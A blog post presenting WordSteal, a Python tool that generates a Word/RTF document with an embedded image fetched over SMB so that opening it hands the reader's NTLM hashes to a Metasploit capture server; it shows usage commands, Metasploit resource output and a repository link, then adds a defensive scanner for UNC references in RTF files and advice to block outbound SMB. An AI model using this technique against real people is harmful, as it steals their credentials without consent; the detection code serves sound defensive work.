This is a short post about WordSteal, an open source Python script that steals Microsoft NTLM hashes for you. It does so by generating a Word document containing a malicious image payload and leveraging the Metasploit framework to capture the NTLM hashes of whoever opens it.
It has been known for quite some time that Microsoft Word versions from Office 95 onwards allow us to embed image files. This functionality has also been used by the CIA “Scribbles” project, a document-watermarking pre-processing system that embeds “Web beacon”-style tags into documents to track people who might spread protected content.
WordSteal uses the auxiliary/server/capture/smb Metasploit module to perform its magic. We all know that this module acts as an SMB server to capture a targeted user's password hashes and can store them in John the Ripper format.
The script is simple to use and works in the following manner:
# python main.py
Usage : main.py IP IMAGENAME run_listener
Example: main.py 127.0.0.1 test.jpg 0
Example: main.py 127.0.0.1 test.jpg 1
Infogen AL - https://www.infogen.al/
If you want to run the listener, use the “1” argument. For example:
python main.py 127.0.0.1 sample.jpg 1
[+] Generated malicious file: 1497402033.rtf [+]
[+] Script Generated Successfully [+]
[+] Running Metasploit Auxiliary Module [+]
[*] Processing metasploit.rc for ERB directives.
resource (metasploit.rc)> use auxiliary/server/capture/smb
resource (metasploit.rc)> set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
resource (metasploit.rc)> set JOHNPWFILE passwords
JOHNPWFILE => passwords
resource (metasploit.rc)> run
[*] Auxiliary module execution completed
[*] Server started.
<----- SNIP ------->
If you do not want to run the listener and simply want to generate a file, use the “0” argument. For example:
# python main.py pentestit.com sample.jpg 0
[+] Generated malicious file: 1497402786.rtf [+]
Infogen AL - https://www.infogen.al/
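The flip side of the technique above is spotting such documents before a user opens them. The following is an added example written for this post, not code from WordSteal or its author: a small Python scanner that flags RTF files carrying UNC (\\host\share) references, since that is how a document makes Word fetch an image over SMB and hand the user's NTLM challenge-response to the capture server. It assumes the generated RTF refers to the capture server by a UNC path (the post does not show the file's contents); the `\*\imgref` group in the constructed sample is a stand-in, not the field syntax WordSteal actually emits, and the hosts and paths are made up. Hosts outside RFC 1918, loopback and link-local ranges are rated high because an SMB connection to the internet is almost never legitimate; the 127.0.0.1 reference mirrors the SRVHOST used in the post.

```python
import ipaddress
import re

# Address ranges treated as "internal": RFC 1918, loopback and link-local.
# Anything else is an internet host, where an SMB connection would hand the
# user's NTLM challenge-response to whoever runs that host.
_INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# A UNC path as it appears inside RTF text. RTF escapes every literal backslash
# by doubling it, so \\host\share\file.jpg is stored as \\\\host\\share\\file.jpg;
# the quantifiers also accept the unescaped form.
_UNC_RE = re.compile(
    r'\\{2,4}(?P<host>[A-Za-z0-9][A-Za-z0-9.-]*)'
    r'\\{1,2}(?P<path>[^\\\s"};]+(?:\\{1,2}[^\\\s"};]+)*)'
)


def find_unc_references(rtf_text):
    """Return (host, path) tuples for every UNC path found in the document."""
    refs = []
    for m in _UNC_RE.finditer(rtf_text):
        path = m.group("path").replace("\\\\", "\\")   # undo RTF doubling
        refs.append((m.group("host"), path))
    return refs


def classify_host(host):
    """'internal', 'external', or 'unknown' (a hostname we cannot resolve offline)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "unknown"
    return "internal" if any(ip in net for net in _INTERNAL_NETS) else "external"


def scan_rtf(rtf_text, allowed_hosts=frozenset()):
    """Flag UNC references in an RTF document.

    Hosts in allowed_hosts (known file servers) are ignored. Internet hosts are
    rated 'high'; internal or unresolved hosts still get 'medium' because an RTF
    that loads content over SMB is unusual enough to deserve a look.
    """
    if not rtf_text.lstrip().startswith("{\\rtf"):
        return {"is_rtf": False, "findings": [], "verdict": "not-rtf"}
    findings = []
    for host, path in find_unc_references(rtf_text):
        if host.lower() in allowed_hosts:
            continue
        kind = classify_host(host)
        findings.append({
            "host": host, "path": path, "host_class": kind,
            "severity": "high" if kind == "external" else "medium",
        })
    if not findings:
        verdict = "clean"
    elif any(f["severity"] == "high" for f in findings):
        verdict = "suspicious"
    else:
        verdict = "review"
    return {"is_rtf": True, "findings": findings, "verdict": verdict}


# Constructed sample: a minimal RTF body with two UNC image references. The
# group name \*\imgref is a stand-in, not the field syntax WordSteal emits.
SAMPLE_RTF = (
    r'{\rtf1\ansi\deff0 {\fonttbl{\f0 Calibri;}}'
    r'\pard Quarterly report\par '
    r'{\*\imgref "\\\\203.0.113.10\\pics\\logo.jpg"}'
    r'{\*\imgref "\\\\127.0.0.1\\share\\sample.jpg"}'
    r'\par}'
)

if __name__ == "__main__":
    # "fileserver01" stands in for an allow-listed internal file server.
    report = scan_rtf(SAMPLE_RTF, allowed_hosts={"fileserver01"})
    print(report["verdict"])
    for f in report["findings"]:
        print(f"  [{f['severity']}] \\\\{f['host']}\\{f['path']}")
```

Running it on the sample reports "suspicious" with a high finding for 203.0.113.10 and a medium one for 127.0.0.1. In practice you would point it at a mail gateway's attachment quarantine; the more durable mitigation on the endpoint side is blocking outbound SMB (TCP 445) at the perimeter, which defeats the external capture server regardless of how the document is crafted.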
With no external dependencies, grab WordSteal from the Git repository here!